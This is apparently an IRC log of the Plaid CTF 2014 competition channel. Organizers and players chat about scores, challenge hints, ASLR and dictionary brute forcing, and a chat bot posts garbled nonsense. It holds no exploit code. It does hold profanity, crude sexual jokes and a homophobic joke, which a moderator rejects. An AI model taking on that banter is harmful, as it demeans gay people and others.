  8962. (13:21:34) (+frozencemetery) gosh
  8963. (13:22:01) (+ricky) Hertz: http://www.shapesecurity.com/
  8964. (13:22:33) (+tylerni7) ricky: any resemblance to that is purely coincedential, I'm sure
  8965. (13:23:12) ••• jOin: (TMT) ([email protected])
  8966. (13:23:36) (_blasty_) can I message someone about web100 ?
  8967. (13:23:48) (+ricky) _blasty_: Feel free to message me
  8968. (13:23:49) (_blasty_) hmm well lets try a bit harder first
  8969. (13:23:53) (+ricky) OK
  8970. (13:23:58) (+ricky) Though cai_ wrote this
  8971. (13:24:10) ••• jOin: (snoopybbt) ([email protected])
  8972. (13:24:24) ••• qUit: (nofiki1) ([email protected]) Quit: Leaving.
  8973. (13:24:30) ••• qUit: (ronbarrey) ([email protected]) Remote host closed the connection
  8974. (13:24:42) (+mserrano) AWWWWWW SHEEEEEITTTTTTTTt
  8975. (13:24:46) (+mserrano) 1pt difference
  8976. (13:25:10) (+ricky) Way to keep things exciting, Dragon Sector!
  8977. (13:25:18) (+ricky) 1 point difference, go go go breakthrough!
  8978. (13:25:44) (robbje) oh, wow
  8979. (13:25:53) (sven) :D
  8980. (13:25:55) (sven) not good.
  8981. (13:26:00) • sven needs to stop failing
  8982. (13:26:23) (halfvollemelk) you want it DIRTY NATIVE
  8983. (13:26:27) (tokki) OOOOH SHETTTT
  8984. (13:26:33) (tokki) They only need poop!
  8985. (13:27:04) (_blasty_) FUCK FUCK FUCK
  8986. (13:27:05) ••• qUit: (eZpl0it) ([email protected]) Ping timeout: 252 seconds
  8987. (13:27:06) ••• qUit: (Beched) (6dbc7f17@gateway/web/freenode/ip.109.188.127.23) Ping timeout: 240 seconds
  8988. (13:27:39) (trelgak) Can anyone help me with Reversing 200?
  8989. (13:27:39) (geobot) you manage to change any libc for crypto 200?
  8990. (13:28:12) (+mserrano) _blasty_: solve problem gogogogo
  8991. (13:28:16) (tomcr00se) what user do we want to be on web100?
  8992. (13:28:18) (+ricky) 0xffa has a big head start on bronies 2 thouh - would be awesome if that were the distinguisher :-)
  8993. (13:28:27) (+tylerni7) lol
  8994. (13:28:37) ••• jOin: (nofiki) ([email protected])
  8995. (13:28:47) (iago-x86) Hmm, my whatscat test payload worked once, but isn't working a second time, even with a new account.. is there caching going on that I have to watch out for?
  8996. (13:29:00) (+tylerni7) iago-x86: we have done nothing special
  8997. (13:29:03) (Im11Plus1) Questions on freya....who can help?
  8998. (13:29:08) (iago-x86) Hmm, weird, I can do it over and over on my own box
  8999. (13:29:09) (+ricky) Nice 0xffa!
  9000. (13:29:15) (+tylerni7) ...and 0xffa back on top :O
  9001. (13:29:17) (+tylerni7) this is so exciting
  9002. (13:29:18) (sven) \o/
  9003. (13:29:21) (+ricky) Now leading by 256
  9004. (13:29:24) (+tylerni7) iago-x86: feel free to pm
  9005. (13:29:26) (+frozencemetery) Im11Plus1: hit me
  9006. (13:29:33) • +tylerni7 slaps frozencemetery
  9007. (13:29:35) • +ricky slaps frozencemetery
  9008. (13:29:37) ••• jOin: (ronbarrey) ([email protected])
  9009. (13:29:44) ••• qUit: (TMT) ([email protected]) Ping timeout: 250 seconds
  9010. (13:29:45) (dwn) hey who can I PM for something on whatscat
  9011. (13:29:47) (+frozencemetery) D:
  9012. (13:29:49) (+tylerni7) dwn: me
  9013. (13:30:02) ••• jOin: (Lel) (43a49c58@gateway/web/cgi-irc/kiwiirc.com/ip.67.164.156.88)
  9014. (13:30:24) ••• jOin: (Reset__) (79b22486@gateway/web/freenode/ip.121.178.36.134)
  9015. (13:30:26) ••• nIck: (Lel) is now known as (Guest74316)
  9016. (13:30:34) ••• qUit: (zoff_ita) ([email protected]) Quit: Leaving.
  9017. (13:30:42) ••• nIck: (Guest74316) is now known as (Hero2Day)
  9018. (13:31:28) ••• qUit: (nonroot) ([email protected]) Ping timeout: 250 seconds
  9019. (13:32:54) ••• jOin: (c1l0) ([email protected])
  9020. (13:34:36) (+gbarboza) robbje: did you still have a tenement question?
  9021. (13:35:37) ••• mOde: (ChanServ) sets (+o mserrano)
  9022. (13:35:42) ••• tOpic: (mserrano) changes topic to ([Plaid CTF 2014 - play.plaidctf.com] 2.5 Hours left | $30 added to each cash prizes so far (from CHANCE card))
  9023. (13:35:53) ••• qUit: (copyleft_) ([email protected]) Ping timeout: 276 seconds
  9024. (13:36:20) ••• qUit: (snoopybbt) ([email protected]) Quit: Leaving.
  9025. (13:38:07) ••• jOin: (Sin__) ([email protected])
  9026. (13:38:27) ••• qUit: (thedoctordmc) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186) Quit: Page closed
  9027. (13:39:33) ••• nIck: ([pwn]TM) is now known as (Thordenm)
  9028. (13:39:34) (+tylerni7) robot mafia
  9029. (13:39:36) (+tylerni7) what are you doing
  9030. (13:39:40) (+tylerni7) stahp
  9031. (13:39:48) (Thordenm) we are robot talking over!
  9032. (13:39:51) ••• jOin: (nonroot) ([email protected])
  9033. (13:39:52) ••• jOin: (sewilton) ([email protected])
  9034. (13:40:24) ••• qUit: (rvpersie) ([email protected]) Remote host closed the connection
  9035. (13:40:33) (@mserrano) robot mafia seriously what
  9036. (13:40:49) (_blasty_) ?
  9037. (13:41:04) (@mserrano) they are submitting a ton of huge random numbers as flags
  9038. (13:41:06) ••• mOde: (mserrano) sets (-o mserrano)
  9039. (13:41:08) (+ricky) (Spamming random key submissoins)
  9040. (13:41:11) (+tylerni7) _blasty_: they are submitting like.. 30 digit numbers to us
  9041. (13:41:23) ••• jOin: (ggis) ([email protected])
  9042. (13:41:31) (_blasty_) lol
  9043. (13:41:38) (+tylerni7) we don't know why
  9044. (13:42:09) ••• jOin: (Sliden) ([email protected])
  9045. (13:42:16) (deject3d) does ponyboy2004 check his pm's instantly
  9046. (13:42:46) (criple_ripper) how much time left?
  9047. (13:42:53) (+tylerni7) 2 hours 17 minutes
  9048. (13:43:59) ••• jOin: (robotmafia) ([email protected])
  9049. (13:44:07) (+ricky) deject3d: looking now , look slike there was an issue
  9050. (13:44:22) ••• jOin: (rvpersie) ([email protected])
  9051. (13:44:33) (deject3d) i verified he checked a pm like 40 mins ago but now my attack doesn't seem to be doing anything
  9052. (13:44:42) (deject3d) ty for checking
  9053. (13:45:08) (|x_x|) Submitting 30 digit number strings as keys works? I need to get in on that.
  9054. (13:45:16) (+tylerni7) :|
  9055. (13:45:19) (|x_x|) :3
  9056. (13:45:21) (Pitr_) thanks for the hint. Back to WWW::Mechanize!
  9057. (13:45:35) (+frozencemetery) D:
  9058. (13:46:25) ••• qUit: (sewilton) ([email protected]) Quit: Lost terminal
  9059. (13:46:54) (+ricky) deject3d: Sorry, fixed now
  9060. (13:47:07) (deject3d) works, ty
  9061. (13:48:47) (+ricky) ponyboy2004 got banned for dirbustering
  9062. (13:48:49) (+ricky) That's why it was broken
  9063. (13:48:50) (+mserrano) lol
  9064. (13:48:51) (+tylerni7) lol
  9065. (13:48:52) (Guest68736) halp2js ..... the guy who wrote the javacode should get an oscar ...
  9066. (13:48:57) (+mserrano) Guest68736: thank clockish
  9067. (13:48:59) ••• qUit: (ronbarrey) ([email protected]) Ping timeout: 240 seconds
  9068. (13:49:08) (+tylerni7) spam and hex
  9069. (13:49:08) (plaintext) fuck yeah
  9070. (13:49:09) (+tylerni7) nice :D
  9071. (13:49:12) (plaintext) ty :D
  9072. (13:49:34) (deject3d) omg ponyboy navigates away from his pms so fast
  9073. (13:49:43) (+ricky) It's not *that* fast
  9074. (13:49:55) (+ricky) Oh if you're using something interactive then it's fast
  9075. (13:50:02) (+ricky) Nice, 0xffa cements their lead some more
  9076. (13:50:09) ••• jOin: (eZpl0it) ([email protected])
  9077. (13:50:10) (_blasty_) DO NOT
  9078. (13:50:12) (_blasty_) WORSHIP
  9079. (13:50:13) (_blasty_) FALSE IDOLS
  9080. (13:50:18) (+tylerni7) wut
  9081. (13:51:05) ••• jOin: (copyleft_) ([email protected])
  9082. (13:51:06) ••• qUit: (zzoru) (8ff8f941@gateway/web/freenode/ip.143.248.249.65) Ping timeout: 240 seconds
  9083. (13:51:11) (+awesie) w/ion 7
  9084. (13:51:13) (+awesie) ugh
  9085. (13:51:27) (robbje) gbarboza: no
  9086. (13:51:45) (robbje) gbarboza: it dropped the flag literally a minute later ;)
  9087. (13:51:58) (+ricky) :-)
  9088. (13:52:04) ••• qUit: (nUl1) (5d9dadb6@gateway/web/freenode/ip.93.157.173.182) Quit: Page closed
  9089. (13:52:16) (+ricky) Somebody hack the Bigson!
  9090. (13:52:24) (tomcr00se) Bigson!!!
  9091. (13:52:32) (+ricky) tomcr00se: Are you hacking the Bigson?
  9092. (13:52:42) (tomcr00se) lol nope too big son
  9093. (13:52:48) (tomcr00se) i'm solving web100
  9094. (13:52:52) (+ricky) Aw
  9095. (13:52:53) ••• jOin: (nUl1) (5d9dadb6@gateway/web/freenode/ip.93.157.173.182)
  9096. (13:53:05) (tomcr00se) brute forcing the whole oxford english dictionary now
  9097. (13:53:28) (+ricky) Wow, 0xffa just widening the gap
  9098. (13:53:32) (|x_x|) There's a web100?!
  9099. (13:53:35) (|x_x|) There's a web100!
  9100. (13:53:35) (geobot) if there's a difference between us or could be doing it wrong
  9101. (13:53:36) ••• qUit: (someone__) (d1cb4e22@gateway/web/freenode/ip.209.203.78.34) Ping timeout: 240 seconds
  9102. (13:53:38) • |x_x| is still in the game.
  9103. (13:53:41) (+tylerni7) dragon sector, you better catch up :O
  9104. (13:53:41) (Tapyroe__) Arghh, mt. pox has been thwarting me since the start! I'd love to finish it before this ends.. Anyone I can pm about it?
  9105. (13:53:41) (_blasty_) :-]
  9106. (13:53:54) ••• qUit: (copyleft_) ([email protected]) Client Quit
  9107. (13:53:57) • +ricky is curious as to how big 0xffa is
  9108. (13:53:59) (+tylerni7) Tapyroe__: you can pm.. not sure how much I'll help though :)
  9109. (13:54:00) (+ricky) This stream of solves is impressive
  9110. (13:54:18) ••• qUit: (rvpersie) ([email protected]) Remote host closed the connection
  9111. (13:54:18) (Guest68736) anyone have an idea how to solve this java script code and have a hint :X
  9112. (13:54:18) (geobot) better than a java prng thing and you have to me
  9113. (13:54:30) (KT) is parlor solvable now?
  9114. (13:54:43) ••• jOin: (copyleft_) ([email protected])
  9115. (13:54:48) (+tylerni7) KT: ?
  9116. (13:56:18) ••• qUit: (chrissing) ([email protected]) Remote host closed the connection
  9117. (13:56:50) ••• qUit: (copyleft_) ([email protected]) Client Quit
  9118. (13:56:50) ••• jOin: (chrissing) ([email protected])
  9119. (13:57:05) ••• jOin: (lmoro) ([email protected])
  9120. (13:57:27) ••• jOin: (jmgrosen) ([email protected])
  9121. (13:57:37) ••• qUit: (johnCool) ([email protected]) Ping timeout: 252 seconds
  9122. (13:58:21) ••• qUit: (nofiki) ([email protected]) Quit: Leaving.
  9123. (13:58:33) (lkwpeter) should we really try manual bruteforcing for web 100 ?!
  9124. (13:58:34) (geobot) but not the hash in the manual matches what the world
  9125. (13:58:35) ••• qUit: (cool_guy) ([email protected]) Ping timeout: 240 seconds
  9126. (13:58:43) (sven) [20:54:39] ricky is curious as to how big 0xffa is
  9127. (13:58:45) (sven) we're just awesome!
  9128. (13:58:52) (+ricky) :-)
  9129. (13:59:00) (+tylerni7) well we can see how awesome you are :)
  9130. (13:59:05) (robbje) and how many is awesome? :>
  9131. (13:59:05) (+tylerni7) but how big are you :P
  9132. (13:59:07) (clockish) geobot: chicken chicken chicken chicken chicken
  9133. (13:59:20) (clockish) geobot: chicken chicken chicken chicken chicken chicken
  9134. (13:59:23) (clockish) awww
  9135. (13:59:24) ••• jOin: (muchacho) ([email protected])
  9136. (13:59:30) (Guest68736) tomcr00se: oxford dict. works ? :D
  9137. (13:59:32) (+ricky) geobot: banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana
  9138. (13:59:33) (Guest68736) on web100
  9139. (13:59:33) (geobot) web100
  9140. (13:59:46) (Adran) on w
  9141. (13:59:46) (Hertz) yea works
  9142. (13:59:47) (Hertz) :D
  9143. (13:59:52) (sven) i'm about 5' 11"
  9144. (13:59:54) ••• jOin: (snoopybbt) ([email protected])
  9145. (13:59:59) (+tylerni7) sven: ah okay, thanks
  9146. (14:00:05) (+dickoff) world's largest ctf player
  9147. (14:00:08) (sven) always glad to help!
  9148. (14:00:09) (geobot) (i'm glad to a team that means like pwn2own/pwnium 0days :p
  9149. (14:00:26) ••• qUit: (ramsexy) ([email protected]) Quit: Quitte
  9150. (14:00:50) ••• qUit: (chrissing) ([email protected]) Ping timeout: 245 seconds
  9151. (14:00:52) (+ricky) Only 2 more hours!
  9152. (14:00:57) (+tylerni7) D:
  9153. (14:01:05) (+tylerni7) and the top 3 are still in contention!
  9154. (14:01:20) ••• jOin: (bool_101) ([email protected])
  9155. (14:01:22) (Hertz) give me some flags, to have top 4 in contention
  9156. (14:01:22) (AnthraX101) And the last file just opened. Lucky, that :P
  9157. (14:01:29) (nopple) geobot: ricky cheese ricky cheese ricky cheese ricky cheese ricky cheese ricky cheese ricky cheese ricky cheese
  9158. (14:01:33) (+ricky) Hahh
  9159. (14:01:35) (+ricky) Oh wow
  9160. (14:01:38) (+ricky) Jackshit is out
  9161. (14:01:42) (+ricky) Go go go
  9162. (14:01:48) (+ricky) (As if we didn't already have enough challenges0
  9163. (14:01:52) (+ricky) This will be the last one I believe
  9164. (14:01:54) (+ricky) Have fnu
  9165. (14:02:23) ••• qUit: (bool101) ([email protected]) Ping timeout: 252 seconds
  9166. (14:02:32) ••• jOin: (amar) (80edcf34@gateway/web/freenode/ip.128.237.207.52)
  9167. (14:02:32) ••• qUit: (phiber__) ([email protected]) Ping timeout: 276 seconds
  9168. (14:02:56) ••• nIck: (amar) is now known as (Guest75992)
  9169. (14:03:27) ••• qUit: (r1cky) ([email protected]) Quit: Verlassend
  9170. (14:04:55) ••• jOin: (jakemask) ([email protected])
  9171. (14:07:01) (mrsmith67) for web100 does bruting with oed really work?
  9172. (14:07:33) (lkwpeter) good question
  9173. (14:07:40) (lkwpeter) forbidden or allowed ?!
  9174. (14:08:18) (+tylerni7) it won't work...
  9175. (14:08:21) (+tylerni7) well
  9176. (14:08:24) (+tylerni7) you can try
  9177. (14:09:50) ••• jOin: (someone_) (d1cb4e22@gateway/web/freenode/ip.209.203.78.34)
  9178. (14:09:50) (almac) who can I PM to get a little guidance for kpop?
  9179. (14:09:54) ••• nIck: (lmoro) is now known as (johnCool)
  9180. (14:10:04) (+ricky) Aaaany more bronies questions? Someone's got to take the 500 points :-)
  9181. (14:10:20) (Adran) ricky: what is the answer? =D
  9182. (14:10:23) (+tylerni7) poop
  9183. (14:10:24) (Adran) (joking)
  9184. (14:10:28) (+ricky) The answer is the contents of the key file
  9185. (14:10:29) (geobot) or the contents of jerkcity
  9186. (14:10:38) (+tylerni7) geobot: you are the best
  9187. (14:10:38) ••• jOin: (Zoro) (328200f8@gateway/web/freenode/ip.50.130.0.248)
  9188. (14:12:26) ••• jOin: (cool_guy) ([email protected])
  9189. (14:12:54) ••• qUit: (pez) ([email protected]) Quit: WeeChat 0.4.3
  9190. (14:13:12) (wtbw) how long left?
  9191. (14:13:26) (+cai_) little less than 2 hours
  9192. (14:14:16) (+ricky) Enough time to hack the Bigson!
  9193. (14:14:20) (+tylerni7) :P
  9194. (14:14:40) (johnCool) Well, I've got enough of this :) Thanks you guys it was a great ctf.
  9195. (14:14:48) (+ricky) Thanks for playing!
  9196. (14:14:52) (wtbw) ty
  9197. (14:15:15) ••• jOin: (phiber__) ([email protected])
  9198. (14:15:17) ••• qUit: (johnCool) ([email protected]) Quit: bb
  9199. (14:15:23) ••• jOin: (Saxophie) ([email protected])
  9200. (14:15:53) (NK_) just to be sure
  9201. (14:15:57) (halfvollemelk) web100.. i'm logged in as admin, but no admin interface?
  9202. (14:15:57) (geobot) i am going for bronies 2 logged in physical sports?
  9203. (14:15:59) (NK_) is the tor service still up ?
  9204. (14:16:04) (+tylerni7) NK_: :|
  9205. (14:16:07) (+tylerni7) I will check
  9206. (14:16:08) (+tylerni7) but...
  9207. (14:16:12) (+tylerni7) it has been up the entire game
  9208. (14:16:13) (+houqp_) ninjafish: yes
  9209. (14:16:15) (NK_) okay :)
  9210. (14:16:15) (+tylerni7) and like 100 people have asked
  9211. (14:16:18) (+houqp_) NK_: yes
  9212. (14:16:21) (NK_) oh
  9213. (14:16:28) (NK_) sorry then :)
  9214. (14:16:32) (+ricky) halfvollemelk: There should be a message that tells you what to do next when you login as admin
  9215. (14:17:23) (NK_) tor is too damn slow
  9216. (14:17:40) (Zoro) molasses
  9217. (14:17:46) (+houqp_) NK_: yeah, you need to do somethign about it
  9218. (14:18:11) (NK_) okay
  9219. (14:18:23) ••• pArt: (BinaryCrystal) ([email protected])
  9220. (14:18:41) (foundation) i have a new feature request for radare2
  9221. (14:18:47) (NK_) i see
  9222. (14:18:57) (foundation) fing C++ template debugging support!!!
  9223. (14:19:13) (Guest68736) hahahaha the video on web100
  9224. (14:19:15) (Guest68736) xD
  9225. (14:19:49) (ciliated) any hints on kpop?
  9226. (14:19:49) (geobot) darn, we should use pm for kpop?
  9227. (14:20:53) ••• qUit: (PoopyPantsSr) ([email protected]) Ping timeout: 246 seconds
  9228. (14:20:58) ••• jOin: (inter) ([email protected])
  9229. (14:21:22) ••• qUit: (muchacho) ([email protected]) Ping timeout: 258 seconds
  9230. (14:21:51) ••• jOin: (chrissing) ([email protected])
  9231. (14:21:51) (Zoro) What are the CHANCE tiles for?
  9232. (14:22:03) ••• qUit: (Holographic) ([email protected])
  9233. (14:22:04) (+tylerni7) Zoro: read the rules
  9234. (14:22:06) ••• qUit: (himanshu_) (1b22f3ba@gateway/web/freenode/ip.27.34.243.186) Ping timeout: 240 seconds
  9235. (14:22:09) ••• mOde: (ChanServ) sets (+o cai_)
  9236. (14:22:11) ••• jOin: (copyleft_) ([email protected])
  9237. (14:22:23) ••• tOpic: (cai_) changes topic to ([Plaid CTF 2014 - play.plaidctf.com] 2.5 Hours left | $40 added to each cash prizes so far (from CHANCE card))
  9238. (14:22:28) (@cai_) apparently i missed one :p
  9239. (14:22:31) (+tylerni7) :O
  9240. (14:22:35) ••• qUit: (DeadheadTn) ([email protected]) Ping timeout: 240 seconds
  9241. (14:22:40) ••• jOin: ([GoN]Jakkdu) ([email protected])
  9242. (14:22:42) ••• mOde: (ChanServ) sets (-o cai_)
  9243. (14:22:49) ••• jOin: (PoopyPantsSr) ([email protected])
  9244. (14:22:52) (jagger_) 2.5h? and not 1.5?
  9245. (14:22:57) (+cai_) 1.5
  9246. (14:23:13) (+cai_) i only updated the cash bonus. i'll update topic again
  9247. (14:23:18) ••• mOde: (ChanServ) sets (+o cai_)
  9248. (14:23:22) ••• jOin: (bool1011) ([email protected])
  9249. (14:23:31) ••• tOpic: (cai_) changes topic to ([Plaid CTF 2014 - play.plaidctf.com] 1.5 Hours left | $40 added to each cash prizes so far (from CHANCE card))
  9250. (14:23:38) ••• mOde: (ChanServ) sets (-o cai_)
  9251. (14:24:49) ••• qUit: (bool_101) ([email protected]) Ping timeout: 258 seconds
  9252. (14:27:34) (+mserrano) Hi Brooklynt Overflow
  9253. (14:27:39) (+mserrano) We are glad you had a burger for lunch and it was good
  9254. (14:27:40) (+dickoff) Brooklynt_Overfl: Where'd you get your burger
  9255. (14:27:46) (+ricky) We had Indian food for lunch
  9256. (14:27:54) (+ricky) It was better than your burger
  9257. (14:28:01) (+tylerni7) ricky: did you get it from the place on craig?
  9258. (14:28:03) ••• qUit: (_joeje_) ([email protected]) Quit: Leaving
  9259. (14:28:04) (+ricky) Yup
  9260. (14:28:07) (+tylerni7) how was it?
  9261. (14:28:08) (+ricky) Big fan of that place
  9262. (14:28:10) (+tylerni7) I've never been there
  9263. (14:28:14) (+tylerni7) not tamarind, righ?
  9264. (14:28:14) (+ricky) Oh you've got to try it
  9265. (14:28:17) (+tylerni7) right*
  9266. (14:28:18) (+ricky) No, Kohli's
  9267. (14:28:21) (+tylerni7) huh
  9268. (14:28:23) (zoku) I have ezhp working locally, but not on your server?
  9269. (14:28:24) (+mserrano) tylerni7: tamarind is super good but way more expensive
  9270. (14:28:29) ••• nIck: (bool1011) is now known as (bool101)
  9271. (14:28:29) (+mserrano) zoku: are you assuming aslr is off
  9272. (14:28:32) (zoku) yes
  9273. (14:28:32) (+tylerni7) I went to the old one before they shut down, and it was /ok/
  9274. (14:28:32) (+mserrano) because that assumption is wrong
  9275. (14:28:35) ••• qUit: (bool101) ([email protected]) Changing host
  9276. (14:28:36) ••• jOin: (bool101) (~bool@unaffiliated/bool101)
  9277. (14:28:36) (zoku) er, sorry mserrano, no
  9278. (14:28:37) (+tylerni7) hadn't been to the new one
  9279. (14:28:42) (zoku) mserrano: it runs on my server with aslr on
  9280. (14:28:49) (zoku) $ cat /proc/sys/kernel/randomize_va_space
  9281. (14:28:53) (zoku) 2
  9282. (14:28:59) (+mserrano) zoku: on some systems aslr does not randomize the relevant thing
  9283. (14:29:04) (+mserrano) on our system it does
  9284. (14:29:09) (+mserrano) v0v
  9285. (14:29:12) (zoku) god damnit
  9286. (14:29:17) (+tylerni7) oh boy, dragon sector got zfs
  9287. (14:29:21) (+tylerni7) :O
  9288. (14:29:22) (+ricky) Uh oh
  9289. (14:29:22) (+mserrano) The binary running on the server is the same as the one we gave you
  9290. (14:29:24) (+tylerni7) WHO WILL WIN
  9291. (14:29:25) (+ricky) Getting cloes again
  9292. (14:29:27) (+tylerni7) this is so exciting
  9293. (14:29:28) (+mserrano) and it has been confirmed to work
  9294. (14:29:31) (+mserrano) MUCH EXCITE
  9295. (14:29:32) (+mserrano) SUCH WOW
  9296. (14:29:34) (+ricky) I think whoever hacks the Bigson will win
  9297. (14:29:34) (+mserrano) VERY FLAGE
  9298. (14:29:35) (geobot) teh flage is not poop
  9299. (14:29:36) (+mserrano) MANY CTF
  9300. (14:29:40) (+ricky) So you should all drop everything and go hack the Bigson
  9301. (14:29:54) (+frozencemetery) worship the old norse gods!
  9302. (14:30:00) (+tylerni7) geobot: that's not even true!
  9303. (14:30:00) (geobot) not even tried to determine who gets to you might be stuck on some inconsistencies in windows but works
  9304. (14:30:02) (+dickoff) geobot: don't leak flags in channel please
  9305. (14:30:05) (clockish) geobot: you lie!
  9306. (14:30:07) (+ricky) geobot: banana
  9307. (14:30:23) (+mserrano) geobot: banana
  9308. (14:30:29) (+houqp_) geobot: banana
  9309. (14:30:30) (clockish) geobot: banana banana banana banana banana banana
  9310. (14:30:43) (+cai_) geobot: banana
  9311. (14:30:50) (+dickoff) I like bananas
  9312. (14:30:52) (wtbw) O_o
  9313. (14:30:58) (+frozencemetery) geobot: bananananananabatman
  9314. (14:31:05) (clockish) banana banana banana banana banana banana
  9315. (14:31:08) ••• qUit: (copyleft_) ([email protected]) Ping timeout: 276 seconds
  9316. (14:31:09) (+houqp_) geobot: poopnana
  9317. (14:31:15) (+dickoff) he's too clever for us
  9318. (14:31:28) (KT) lol :)
  9319. (14:31:35) ••• jOin: (copyleft_) ([email protected])
  9320. (14:32:48) (+ricky) You can hack the Bigson from a mobile device - isn't web awesome?
  9321. (14:32:52) ••• jOin: (sweet_potatoes) ([email protected])
  9322. (14:33:10) (Thordenm) ricky: but can you do it with punchcards?
  9323. (14:33:16) ••• jOin: (zoomequipd) (~zoomequip@gateway/tor-sasl/zoomequipd)
  9324. (14:33:22) ••• jOin: (nonconstant) (c1e17dfd@gateway/web/freenode/ip.193.225.125.253)
  9325. (14:33:26) (sweet_potatoes) any hint for web200 (javascript one) :/ ?
  9326. (14:33:30) ••• qUit: (snoopybbt) ([email protected]) Quit: Leaving.
  9327. (14:33:31) (oceanx) banananaaaaa
  9328. (14:33:34) (sweet_potatoes) lolz
  9329. (14:33:37) ••• jOin: (asdsaf) ([email protected])
  9330. (14:33:44) (sweet_potatoes) oceanx: sexy ?
  9331. (14:33:44) (sigsegv_) any hints on stego?
  9332. (14:33:45) (geobot) i'm done according to organizers told us hints
  9333. (14:34:02) (+tylerni7) sigsegv_: the flag is INSIDE THE COMPUTER
  9334. (14:34:14) ••• jOin: (_joe_) ([email protected])
  9335. (14:34:15) (inter) tylerni7: NO THE FLAG IS IN YOUR MIND
  9336. (14:34:22) (inter) SO YOU TELL; ME
  9337. (14:34:27) (Zerith) where do I enter a key for Misc ? :\
  9338. (14:34:27) (geobot) just enter the r_netsec folks
  9339. (14:34:30) (Zerith) oops
  9340. (14:34:35) (Zerith) ignore dat
  9341. (14:34:37) (+mserrano) Zerith: same place you enter any key
  9342. (14:34:37) (+mserrano) lol
  9343. (14:35:03) (+frozencemetery) i,i bend over and I'll show you
  9344. (14:35:06) (inter) you shouldve
  9345. (14:35:17) (inter) named the multiplication question "multiplication is gay"
  9346. (14:35:50) (+frozencemetery) yeah that's not happening inter.
  9347. (14:35:52) (_blasty_) ok
  9348. (14:36:05) (Pitr_) wrong. gay multiplication is an oxymoron amongst almost all species.
  9349. (14:36:12) (`Peluche) For chall graphs (crypto 200), when we got the message, do we have to do someting next with the message or the message is the flag ?
  9350. (14:36:20) (+mserrano) `Peluche: the message is the flag
  9351. (14:36:21) (geobot) geobot can always know who own the message someone about 5 hours
  9352. (14:36:27) (+mserrano) but you can decode the number into text
  9353. (14:38:21) ••• jOin: (Digihash) ([email protected])
  9354. (14:38:40) (`Peluche) mserrano: ok. thanks, so I guess I don't have the good number ^^
  9355. (14:38:44) (HeartLESS_) who is not busy? Have a question about web100
  9356. (14:38:45) (geobot) re200 runned correctly but not the video on web100 please?
  9357. (14:39:28) ••• jOin: (bool_101) ([email protected])
  9358. (14:39:35) (HeartLESS_) ricky, I`ve wrote you pm
  9359. (14:39:37) (inter) tylerni7 is watching ponies, so hes not busy HeartLESS_
  9360. (14:39:40) (HeartLESS_) written*
  9361. (14:39:44) ••• jOin: ([CISSP]HoLyVieR) ([email protected])
  9362. (14:39:51) (+cai_) HeartLESS_: you can pm me
  9363. (14:40:35) ••• qUit: (bool101) (~bool@unaffiliated/bool101) Ping timeout: 240 seconds
  9364. (14:41:27) ••• jOin: (shuckens) ([email protected])
  9365. (14:42:56) ••• jOin: (Gut_) (uid24602@gateway/web/irccloud.com/x-lpojyjxhyocewncw)
  9366. (14:43:29) (zoku) I've been working on ezhp all weekend and it works on all my systemmss, I just wanna scoree!
  9367. (14:43:37) ••• jOin: (rvpersie) ([email protected])
  9368. (14:43:41) ••• jOin: (bs`) (~bs@gateway/tor-sasl/bs/x-48276796)
  9369. (14:43:53) (+ricky) zoku: So you have a shell on one of our systems right
  9370. (14:44:01) (+ricky) Via the sass problem
  9371. (14:44:05) (+ricky) See if you can make it work on our system
  9372. (14:44:22) (sven) asking for a friend: what if i root that system to grab the flag? :-P
  9373. (14:44:23) (geobot) grats stratum auhuur for the web100 flag?
  9374. (14:45:08) ••• qUit: (gut) ([email protected]) Quit: My MacBook Pro has gone to sleep. ZZZzzz…
  9375. (14:45:51) (+tylerni7) sven: hmm ricky what do you think?
  9376. (14:46:02) (+tylerni7) sven: I'm not sure how much it'll help :P
  9377. (14:46:03) (geobot) it'll be done this year
  9378. (14:46:12) (_blasty_) DO WE BURN 0DAY YES NO ?
  9379. (14:46:29) (+mserrano) _blasty_: you... definitely do not have to
  9380. (14:46:33) (iago-x86) blackops: obviously
  9381. (14:46:41) (iago-x86) DOL IT
  9382. (14:46:42) (iago-x86) DO IT
  9383. (14:46:43) (+mserrano) _blasty_: you should solve bronies2 though
  9384. (14:46:44) (+mserrano) you can do it
  9385. (14:46:47) (+mserrano) I believe in you
  9386. (14:46:52) (+cai_) _blasty_: you could, and include that in your writeup
  9387. (14:46:58) (+tylerni7) xD
  9388. (14:47:01) (+mserrano) pls include full 0day in writeup
  9389. (14:47:04) (+dickoff) _blasty_: is it worth 4k? :)
  9390. (14:47:08) (+mserrano) 8k*
  9391. (14:47:12) (clockish) _blasty_: will trade 0-days 4 flags
  9392. (14:47:13) (+mserrano) or I guess 4k, yeah
  9393. (14:47:14) (+tylerni7) mserrano: well 1st vs 2nd
  9394. (14:48:09) ••• jOin: (DeadheadTn) ([email protected])
  9395. (14:48:29) (+cai_) man, it's gonna be a huge pain to do a write-up for the ctf.. lol 30 something problems
  9396. (14:48:35) (+cai_) good luck..
  9397. (14:48:48) (+ricky) Hehe
  9398. (14:48:52) (+ricky) Didn't think of that :-)
  9399. (14:49:00) (+ricky) I see that the bigson is crashing
  9400. (14:49:11) (+ricky) This is a great sign :-)
  9401. (14:49:29) (sven) who would make that poor thing crash? :-(
  9402. (14:49:43) (spq) ricky: can we ask something about web800?
  9403. (14:49:58) (+ricky) spq: Sure thing
  9404. (14:49:58) (+mserrano) spq: ask away, you may not get a good answer :P
  9405. (14:50:38) (iago-x86) Luckily, I only solved a few. Easy to make writeup! :)
  9406. (14:51:01) (+tylerni7) iago-x86: writeup is just for cash prizes :)
  9407. (14:51:10) (+ricky) Shhh don't tell him that!
  9408. (14:51:11) (marcoscars02) xD
  9409. (14:51:13) (+mserrano) although we would be happy if you wrote writeups anyway :P
  9410. (14:51:24) (+tylerni7) EVERYONE WHO REGISTED IS REQUIRED TO MAKE WRITEUPS
  9411. (14:51:25) (marcoscars02) tylerni7, or to fill a blog
  9412. (14:51:26) (marcoscars02) XD
  9413. (14:51:27) ••• jOin: (nodocify) ([email protected])
  9414. (14:51:29) (+tylerni7) otherwise we'll kill you
  9415. (14:51:31) (clockish) yeah, everyone should do writeups!
  9416. (14:51:35) (clockish) democratize hacking!
  9417. (14:51:42) (+tylerni7) clockish: keep hacking elite!
  9418. (14:51:46) (+mserrano) unless you're tomcr00se in which case no writeups
  9419. (14:51:50) (+mserrano) in order to keep hacking elite
  9420. (14:51:50) (+frozencemetery) s/democratize/demoralize/ <-- for the way I read it first
